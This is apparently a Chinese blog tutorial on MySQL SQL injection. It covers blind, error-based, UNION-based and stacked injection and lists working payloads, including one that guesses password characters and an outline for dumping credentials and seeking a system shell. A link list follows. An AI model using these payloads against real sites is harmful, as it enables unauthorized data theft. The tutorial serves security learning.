mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入
盲注
关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据
布尔盲注
目标地址:http://newspaper.com/items.php?id=2
对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2
然后攻击者尝试返回 false 的查询:http://newspaper.com/items.php?id=2 and 1=2
对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2
如果网页应用存在 SQL 注入漏洞,那么其可能不会返回数据。为了确认这一点,攻击者会再次注入一次返回 true 的查询:http://newspaper.com/items.php?id=2 and 1=1
如果前后两次查询返回的网页内容不同,攻击者就能够通过组合 Payload 遍历出想要的数据。
时间盲注猜测密码的首字符是否为 ‘2’,是的话等待10秒。
对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
报错注入完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 详细内容见下文
关键点是 构造错误信息,让自己想要的数据被输出到错误信息中
RAND
SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x
RAND(0) 0为随机函数的种子,该函数产生浮点数v,且v的范围为 0 <= v < 1.0
FLOOR(X) 取不大于 X 的最大整数
FLOOR(RAND(0)*2) 返回 0 或 1
0x3a 是 “:” 的 Unicode,单纯为了拼接好看
CONCAT() 拼接字符串
GROUP BY 按拼接字符串分组
COUNT(*) 记录的总数,这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果
结合以上内容,当 FLOOR(RAND(0)*2) 出现重复值时,数据库会报错,报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’
这样我们就可以从报错信息中获取到我们想要的信息,这次是数据库版本。
rand 的结果是随机的,也可以选择以下两种函数来构造错误信息。
ExtractValue
Description: 查询 XML 文档的函数
Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))
Output: - XPATH syntax error: '~5.5.53~'
UpdateXml
Description: 修改 XML 文档的函数
Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)
Output: - XPATH syntax error: '~5.5.53~'
UNION 查询注入UNION 语句合并多个 SELECT 语句的结果并返回
关键点:UNION 连接的多个 SELECT 语句中,每一列的数据类型应该相同,且选中相同数量的列。对于 Oracle 数据库,还要求 SELECT 必须使用 FORM 指定一个有效的表名。
确定列的数量使用 ORDER BY
依次使用以下序列中的语句,直到报错,如 The ORDER BY position number 3 is out of range of the number of items in the select list,进而确认列的数量。
1
2
31 ORDER BY 1--
1 ORDER BY 2--
1 ORDER BY 3--
使用 UNION SELECE NULL,...
NULL 可以被转为任意数据类型,所以这里可以用来作为返回值。
依次使用以下序列中的语句,直到报错,如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,进而确认列的数量。
1
2
31 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
找到字符串类型的列
同样的,可以依次尝试以下序列:
1
2
3
41 UNION SELECT 'a',NULL,NULL,NULL--
1 UNION SELECT NULL,'a',NULL,NULL--
1 UNION SELECT NULL,NULL,'a',NULL--
1 UNION SELECT NULL,NULL,NULL,'a'--
如果对应的列与字符串类型不兼容,就会报错,如 Conversion failed when converting the varchar value ‘a’ to data type int ,所以如果不报错,我们就找到了字符串类型的列。
覆盖原有数据
注入点一般在 WHERE 处,使用 1 AND false UNION SELECT ... 将原有输出覆盖。
堆叠注入
堆叠注入指的是被注入方允许同时执行多条语句,那么攻击者就可以利用额外的语句完成任何操作。
敏感数据
成功注入后,接下来的流程一般是:
获取当前用户/数据库
获取用户名和密码
枚举数据库/表/列
尝试获取系统 shell
结合利用其他漏洞
Reference
mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入相关推荐
- 【小迪安全】Day16web漏洞-SQL注入之盲注
web漏洞-SQL注入之盲注 文章目录 web漏洞-SQL注入之盲注 前言 盲注类型 报错盲注 猜解数据库 猜解表 猜解字段 猜解内容 布尔盲注 猜解数据库 猜解表 猜解字段 猜解内容 延迟注入 前言 ...
- 渗透测试学习笔记(一)注入篇-盲注 二次注入 宽字节注入
时间注入攻击 sleep() 利用函数if(条件,结果1,结果2) len id = 1 and if(length(database())>1,sleep(5),1) 首先猜解表名称长度 s ...
- mysql注入之盲注语句汇总
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- SQLi LABS Less 14 报错注入+布尔盲注
第十四关双引号字符串型注入 , 推荐使用报错注入.布尔盲注. 目录 一.功能分析 二.思路分析 三.解题步骤 方式一:报错注入 第一步.判断注入点 第二步.判断报错条件 第三步.脱库 方式二:布尔盲注 ...
- SQLi LABS Less-13 报错注入+布尔盲注
第十三关是单引号+括号的字符型注入,推荐使用报错注入.布尔盲注. 目录 一.功能分析 二.思路分析 三.解题步骤 方式一:报错注入 第一步.判断注入点 第二步.判断报错条件 第三步.脱库 方式二.布尔 ...
- 05_SQL注入_功能语句报错注入盲注
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 [本章代码来源于pikachu和sqli-lab中的靶场] 开发中,根据不同的需 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- sql注入_1-4_post盲注
sql注入_1-4_post盲注 一.post盲注概念 1.首先post盲注和get盲注一样,只是不会拼接到url中 2.post请求会向指定资源提交数据,请求服务器进行处理,如,表单提交,文件上传等 ...
最新文章
- 裸奔浏览器_大概是最好用的隐私浏览器 - Firefox Focus
- Java抽象类与接口的区别
- Py之docx:Python库之docx简介、安装、使用方法详细攻略
- 二叉搜索树简介和部分题目
- python实现一个字典
- emcy协议_CANopen协议 -
- python和lua哪个有前途_(转)LUA与python根本就不具有可比性
- binarySearch与IndexOf的那些事儿~
- 锂电池接线方法图_老电工整理的41条电路接线方法,每一条都值得收藏
- python点击屏幕_Python屏幕操作
- 修改/etc/resolv.conf又恢复到原来的状态?[转]
- 二叉树的构建及各种遍历回顾
- Oracle与MySQL使用区别
- XenApp 6安装过程中的两个常见错误
- Java解决高并发下商品库存更新
- js图片轮播指示器箭头淡入淡出
- 酒店抖音小程序开发方案
- ESP32|基于ESP32制作的低成本、可拓展性高的NES游戏机(1)(开源ESP32 NES模拟器)-效果演示及介绍
- python生成测试数据_Python基于Hypothesis测试库生成测试数据
- E聊SDK-简介(1): 介绍
热门文章
- 使用ASP.NET Core 3.x 构建 RESTful API - 3.2 路由
- Entity Framework Core生成的存储过程在MySQL中需要进行处理及PMC中的常用命令
- 译 | 宣布ML.NET 1.2 及模型生成器更新(用于 .NET 的机器学习)
- .net core百万设备连接服务和硬件需求测试
- 浅谈一致性Hash原理及应用
- 使用PerfView监测.NET程序性能(一):Event Trace for Windows
- COSCon'18 面向全宇宙招募志愿者啦!
- ABP从入门到精通(1):aspnet-zero-core项目启动及各项目源码说明
- Git 在团队中的最佳实践--如何正确使用Git Flow
- Xamarin支持微软HoloLens混合现实开发